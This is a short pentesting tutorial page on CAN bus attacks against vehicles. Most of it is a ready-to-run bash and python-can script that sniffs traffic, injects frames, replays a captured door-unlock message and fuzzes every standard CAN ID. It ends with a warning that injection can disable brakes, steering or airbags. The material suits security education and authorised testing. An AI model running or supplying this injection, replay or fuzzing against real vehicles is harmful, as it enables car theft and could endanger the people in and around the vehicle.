CAN Bus Attacks

Exploitation

CAN bus (Controller Area Network) has no authentication or encryption. Any ECU can send any message. This guide covers sniffing, injection, and fuzzing attacks.

CAN Sniffing and Injection

can-attacks.sh

bash

# Setup CAN interface (Linux with SocketCAN)
sudo ip link set can0 type can bitrate 500000
sudo ip link set up can0

# Sniff CAN traffic
candump can0

# Filter specific CAN ID
candump can0,123:7FF  # Only show ID 0x123

# Send CAN message
cansend can0 123#DEADBEEF

# Example: Unlock doors (ID and data vary by vehicle)
# 1. Capture CAN traffic while pressing unlock button
candump -l can0

# 2. Analyze log for unlock message
# Look for message that appears once when unlocking

# 3. Replay message
cansend can0 456#01020304

# Fuzzing CAN IDs
for id in $(seq 0 2047); do
  cansend can0 $(printf "%03X#0000000000000000" $id)
  sleep 0.1
done

# Using python-can for scripting
python3 << EOF
import can
bus = can.interface.Bus(channel='can0', bustype='socketcan')

# Send message
msg = can.Message(arbitration_id=0x123, data=[0xDE, 0xAD, 0xBE, 0xEF], is_extended_id=False)
bus.send(msg)

# Sniff messages
for msg in bus:
    print(f"ID: {msg.arbitration_id:03X} Data: {msg.data.hex()}")
EOF

Testing on Live Vehicles

NEVER test CAN injection on moving vehicles. Injecting messages can disable brakes, steering, or airbags. Always test with vehicle on jack stands and use kill switch for safety.

CAN Bus Attacks

CAN Sniffing and Injection

Related Topics

OBD-II Exploitation

IoT Pentesting